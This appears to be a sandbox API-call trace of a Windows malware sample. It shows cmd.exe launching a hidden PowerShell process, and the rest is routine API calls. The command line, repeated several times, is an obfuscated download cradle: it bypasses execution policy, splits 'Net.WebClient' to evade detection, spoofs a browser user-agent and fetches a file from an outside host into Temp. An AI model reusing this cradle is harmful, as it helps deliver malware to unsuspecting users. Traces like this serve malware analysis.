	[0078.898] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f510 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0078.898] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x104, lpBuffer=0x18f510, lpFilePart=0x18f4f0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x18f4f0*="Documents") returned 0x1b
	[0078.898] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0078.898] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f220 | out: lpFindFileData=0x18f220*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Users", cAlternateFileName="")) returned 0x1fc5d0
	[0078.898] FindClose (in: hFindFile=0x1fc5d0 | out: hFindFile=0x1fc5d0) returned 1
	[0078.898] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x18f220 | out: lpFindFileData=0x18f220*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="aETAdzjz", cAlternateFileName="")) returned 0x1fc5d0
	[0078.898] FindClose (in: hFindFile=0x1fc5d0 | out: hFindFile=0x1fc5d0) returned 1
	[0078.898] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", lpFindFileData=0x18f220 | out: lpFindFileData=0x18f220*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x1fc5d0
	[0078.899] FindClose (in: hFindFile=0x1fc5d0 | out: hFindFile=0x1fc5d0) returned 1
	[0078.899] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16
	[0078.899] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0078.899] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 1
	[0078.899] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Documents") returned 1
	[0078.899] GetProcessHeap () returned 0x1e0000
	[0078.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fbad0 | out: hHeap=0x1e0000) returned 1
	[0078.899] GetEnvironmentStringsW () returned 0x1fafd0*
	[0078.899] GetProcessHeap () returned 0x1e0000
	[0078.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0xb2c) returned 0x1fbb10
	[0078.899] FreeEnvironmentStringsW (penv=0x1fafd0) returned 1
	[0078.899] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0078.899] GetProcessHeap () returned 0x1e0000
	[0078.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8d80 | out: hHeap=0x1e0000) returned 1
	[0078.899] GetProcessHeap () returned 0x1e0000
	[0078.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x4016) returned 0x1fc650
	[0078.900] GetProcessHeap () returned 0x1e0000
	[0078.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x260) returned 0x1f9c80
	[0078.900] GetProcessHeap () returned 0x1e0000
	[0078.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc650 | out: hHeap=0x1e0000) returned 1
	[0078.900] GetConsoleOutputCP () returned 0x1b5
	[0078.900] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0078.900] GetUserDefaultLCID () returned 0x409
	[0078.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2
	[0078.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f620, cchData=128 | out: lpLCData="0") returned 2
	[0078.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f620, cchData=128 | out: lpLCData="0") returned 2
	[0078.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f620, cchData=128 | out: lpLCData="1") returned 2
	[0078.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2
	[0078.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0078.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0078.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0078.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0078.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0078.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0078.901] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0078.901] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2
	[0078.901] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0078.901] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0078.901] GetProcessHeap () returned 0x1e0000
	[0078.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20c) returned 0x1f9f60
	[0078.901] GetConsoleTitleW (in: lpConsoleTitle=0x1f9f60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0078.902] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0078.902] GetProcAddress (hModule=0x77040000, lpProcName="CopyFileExW") returned 0x770523d0
	[0078.902] GetProcAddress (hModule=0x77040000, lpProcName="IsDebuggerPresent") returned 0x77048290
	[0078.902] GetProcAddress (hModule=0x77040000, lpProcName="SetConsoleInputExeNameW") returned 0x770517e0
	[0078.902] GetProcessHeap () returned 0x1e0000
	[0078.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x4012) returned 0x1fc650
	[0078.902] GetProcessHeap () returned 0x1e0000
	[0078.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x4010) returned 0x200670
	[0078.902] GetProcessHeap () returned 0x1e0000
	[0078.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x1a) returned 0x1f49a0
	[0078.903] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0078.903] GetProcessHeap () returned 0x1e0000
	[0078.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f49a0 | out: hHeap=0x1e0000) returned 1
	[0078.903] GetProcessHeap () returned 0x1e0000
	[0078.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x200670 | out: hHeap=0x1e0000) returned 1
	[0078.903] GetProcessHeap () returned 0x1e0000
	[0078.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x4010) returned 0x200670
	[0078.903] GetProcessHeap () returned 0x1e0000
	[0078.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x1a) returned 0x1f49a0
	[0078.903] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0078.903] GetProcessHeap () returned 0x1e0000
	[0078.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f49a0 | out: hHeap=0x1e0000) returned 1
	[0078.903] GetProcessHeap () returned 0x1e0000
	[0078.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x200670 | out: hHeap=0x1e0000) returned 1
	[0078.903] GetProcessHeap () returned 0x1e0000
	[0078.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc650 | out: hHeap=0x1e0000) returned 1
	[0078.904] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2=")") returned 78
	[0078.904] _wcsicmp (_String1="FOR", _String2="WNjKdpGDFcPRHnV") returned -17
	[0078.904] _wcsicmp (_String1="FOR/?", _String2="WNjKdpGDFcPRHnV") returned -17
	[0078.904] _wcsicmp (_String1="IF", _String2="WNjKdpGDFcPRHnV") returned -14
	[0078.904] _wcsicmp (_String1="IF/?", _String2="WNjKdpGDFcPRHnV") returned -14
	[0078.904] _wcsicmp (_String1="REM", _String2="WNjKdpGDFcPRHnV") returned -5
	[0078.904] _wcsicmp (_String1="REM/?", _String2="WNjKdpGDFcPRHnV") returned -5
	[0078.904] GetProcessHeap () returned 0x1e0000
	[0078.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0xb0) returned 0x1fa180
	[0078.904] GetProcessHeap () returned 0x1e0000
	[0078.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x30) returned 0x1f69a0
	[0078.904] GetProcessHeap () returned 0x1e0000
	[0078.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x1f8d80
	[0078.905] GetProcessHeap () returned 0x1e0000
	[0078.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0xb0) returned 0x1fa240
	[0078.905] _wcsicmp (_String1="PowErshelL.eXe", _String2=")") returned 71
	[0078.905] _wcsicmp (_String1="FOR", _String2="PowErshelL.eXe") returned -10
	[0078.905] _wcsicmp (_String1="FOR/?", _String2="PowErshelL.eXe") returned -10
	[0078.905] _wcsicmp (_String1="IF", _String2="PowErshelL.eXe") returned -7
	[0078.905] _wcsicmp (_String1="IF/?", _String2="PowErshelL.eXe") returned -7
	[0078.905] _wcsicmp (_String1="REM", _String2="PowErshelL.eXe") returned 2
	[0078.905] _wcsicmp (_String1="REM/?", _String2="PowErshelL.eXe") returned 2
	[0078.905] GetProcessHeap () returned 0x1e0000
	[0078.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0xb0) returned 0x1fa300
	[0078.906] GetProcessHeap () returned 0x1e0000
	[0078.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x2e) returned 0x1f69e0
	[0079.133] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0079.134] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0079.134] GetProcessHeap () returned 0x1e0000
	[0079.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x170) returned 0x1e1a20
	[0079.134] GetProcessHeap () returned 0x1e0000
	[0079.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x2d0) returned 0x1fb050
	[0079.140] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0079.140] GetProcessHeap () returned 0x1e0000
	[0079.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0xe8) returned 0x1e1ba0
	[0079.144] _get_osfhandle (_FileHandle=2) returned 0xb
	[0079.144] GetFileType (hFile=0xb) returned 0x2
	[0079.145] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0079.145] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18eec8 | out: lpMode=0x18eec8) returned 1
	[0079.145] _get_osfhandle (_FileHandle=2) returned 0xb
	[0079.145] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18ef00 | out: lpConsoleScreenBufferInfo=0x18ef00) returned 1
	[0079.145] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4ac96340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d
	[0079.147] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0079.147] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0079.147] GetProcessHeap () returned 0x1e0000
	[0079.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x170) returned 0x1e1c30
	[0079.147] GetProcessHeap () returned 0x1e0000
	[0079.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x2d0) returned 0x1fb6b0
	[0079.147] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0079.147] GetProcessHeap () returned 0x1e0000
	[0079.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0xe8) returned 0x1fb840
	[0079.149] GetStartupInfoW (in: lpStartupInfo=0x18edd0 | out: lpStartupInfo=0x18edd0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) 
	[0079.152] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Documents", lpStartupInfo=0x18ecf0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18eca0 | out: lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessInformation=0x18eca0*(hProcess=0x54, hThread=0x50, dwProcessId=0x568, dwThreadId=0x5fc)) returned 1
	[0079.155] CloseHandle (hObject=0x50) returned 1
	[0079.155] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0079.155] GetProcessHeap () returned 0x1e0000
	[0079.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fbb10 | out: hHeap=0x1e0000) returned 1
	[0079.155] GetEnvironmentStringsW () returned 0x1fb8d0*
	[0079.155] GetProcessHeap () returned 0x1e0000
	[0079.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0xb2c) returned 0x1fc820
	[0079.156] FreeEnvironmentStringsW (penv=0x1fb8d0) returned 1
	[0079.156] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) 

Process:
	id = "21"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4c758000"
	os_pid = "0x568"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "20"
	os_parent_pid = "0x41c"
	cmd_line = "PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 174
	os_tid = 0x5fc

	[0081.129] strcmp (_Str1="EEHeapAllocInProcessHeap", _Str2="CLRLoadLibraryEx") returned 1
	[0081.917] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0082.856] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0082.856] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0082.856] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0082.856] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0083.699] AtlComPtrAssign () 
	[0084.333] GetVersionExW (in: lpVersionInformation=0x18d9f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18d9f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0084.334] GetVersionExW (in: lpVersionInformation=0x18d9f0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18d9f0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0084.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0084.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0084.348] GetVersionExW (in: lpVersionInformation=0x18d760*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18d760*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0084.348] SetErrorMode (uMode=0x1) returned 0x1
	[0088.683] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x18d8c0 | out: lpFileInformation=0x18d8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0088.683] SetErrorMode (uMode=0x1) returned 0x1
	[0088.686] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x18db30 | out: lpdwHandle=0x18db30) returned 0x94c
	[0088.688] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d57370 | out: lpData=0x2d57370) returned 1
	[0088.690] VerQueryValueW (in: pBlock=0x2d57370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18daa8, puLen=0x18daa0 | out: lplpBuffer=0x18daa8*=0x2d5740c, puLen=0x18daa0) returned 1
	[0088.756] lstrlenW (lpString="䅁") returned 1
	[0088.764] VerQueryValueW (in: pBlock=0x2d57370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x18da18, puLen=0x18da10 | out: lplpBuffer=0x18da18*=0x2d574e8, puLen=0x18da10) returned 1
	[0088.764] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0088.766] CoTaskMemAlloc (cb=0x2e) returned 0x27fe00
	[0088.766] lstrcpyW (in: lpString1=0x27fe00, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0088.767] CoTaskMemFree (pv=0x27fe00) 
	[0088.767] VerQueryValueW (in: pBlock=0x2d57370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x18da18, puLen=0x18da10 | out: lplpBuffer=0x18da18*=0x2d5753c, puLen=0x18da10) returned 1
	[0088.767] lstrlenW (lpString="System.Management.Automation") returned 28
	[0088.767] CoTaskMemAlloc (cb=0x3c) returned 0x22dc70
	[0088.767] lstrcpyW (in: lpString1=0x22dc70, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0088.767] CoTaskMemFree (pv=0x22dc70) 
	[0088.767] VerQueryValueW (in: pBlock=0x2d57370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x18da18, puLen=0x18da10 | out: lplpBuffer=0x18da18*=0x2d57598, puLen=0x18da10) returned 1
	[0088.767] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0088.767] CoTaskMemAlloc (cb=0x20) returned 0x27bec0
	[0088.768] lstrcpyW (in: lpString1=0x27bec0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0088.768] CoTaskMemFree (pv=0x27bec0) 
	[0088.768] VerQueryValueW (in: pBlock=0x2d57370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x18da18, puLen=0x18da10 | out: lplpBuffer=0x18da18*=0x2d575d8, puLen=0x18da10) returned 1
	[0088.768] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0088.768] CoTaskMemAlloc (cb=0x44) returned 0x22dc70
	[0088.768] lstrcpyW (in: lpString1=0x22dc70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0088.768] CoTaskMemFree (pv=0x22dc70) 
	[0088.768] VerQueryValueW (in: pBlock=0x2d57370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x18da18, puLen=0x18da10 | out: lplpBuffer=0x18da18*=0x2d57640, puLen=0x18da10) returned 1
	[0088.768] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0088.768] CoTaskMemAlloc (cb=0x76) returned 0x21df00
	[0088.768] lstrcpyW (in: lpString1=0x21df00, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0088.768] CoTaskMemFree (pv=0x21df00) 
	[0088.768] VerQueryValueW (in: pBlock=0x2d57370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x18da18, puLen=0x18da10 | out: lplpBuffer=0x18da18*=0x2d576dc, puLen=0x18da10) returned 1
	[0088.768] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0088.768] CoTaskMemAlloc (cb=0x44) returned 0x22dc70
	[0088.768] lstrcpyW (in: lpString1=0x22dc70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0088.768] CoTaskMemFree (pv=0x22dc70) 
	[0088.768] VerQueryValueW (in: pBlock=0x2d57370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x18da18, puLen=0x18da10 | out: lplpBuffer=0x18da18*=0x2d57740, puLen=0x18da10) returned 1
	[0088.768] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0088.768] CoTaskMemAlloc (cb=0x58) returned 0x1d4d30
	[0088.768] lstrcpyW (in: lpString1=0x1d4d30, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0088.768] CoTaskMemFree (pv=0x1d4d30) 
	[0088.768] VerQueryValueW (in: pBlock=0x2d57370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x18da18, puLen=0x18da10 | out: lplpBuffer=0x18da18*=0x2d577bc, puLen=0x18da10) returned 1
	[0088.768] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0088.768] CoTaskMemAlloc (cb=0x20) returned 0x27bec0
